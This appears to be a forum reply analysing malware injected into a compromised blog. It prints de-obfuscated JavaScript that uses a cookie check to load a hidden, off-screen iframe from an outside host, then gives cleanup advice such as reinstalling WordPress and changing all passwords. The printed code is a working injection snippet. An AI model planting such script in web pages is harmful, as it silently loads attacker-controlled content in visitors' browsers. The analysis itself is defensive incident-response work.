This is pure info. Your malware looks like this when it's de-obfuscated:
function k09() {
var static = 'ajax';
var controller = 'index.php';
var k = document.createElement('iframe');
k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
k.style.position = 'absolute';
k.style.color = '512';
k.style.height = '512px';
k.style.width = '512px';
k.style.left = '1000512';
k.style.top = '1000512';
if (!document.getElementById('k')) {
document.write('<p id=\'k\' class=\'k09\' ></p>');
document.getElementById('k').appendChild(k);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
k09();
}
}
http://dostojewskij-gesellschaft.de/VD49Jdzr.php
simply outputs "OK".
Why?
My guess is that this is an IP/traffic logger. Maybe for the hackers to check which blogs are most active and then later come back and hack that particular site (no need to waste time on a site with 2 visitors a month). This is good and bad.
The good part is that it seems that they haven't used any of your user database or anything else.
The bad part is that they might very well have downloaded your entire database since they've obviously had executing rights on your server, and might've placed their PHP files all over your server. Your best bet is to start on a fresh WP and copy plugins/themes in one-by-one while manually checking them.
Change all passwords. Even your DB login. Consider everything compromised.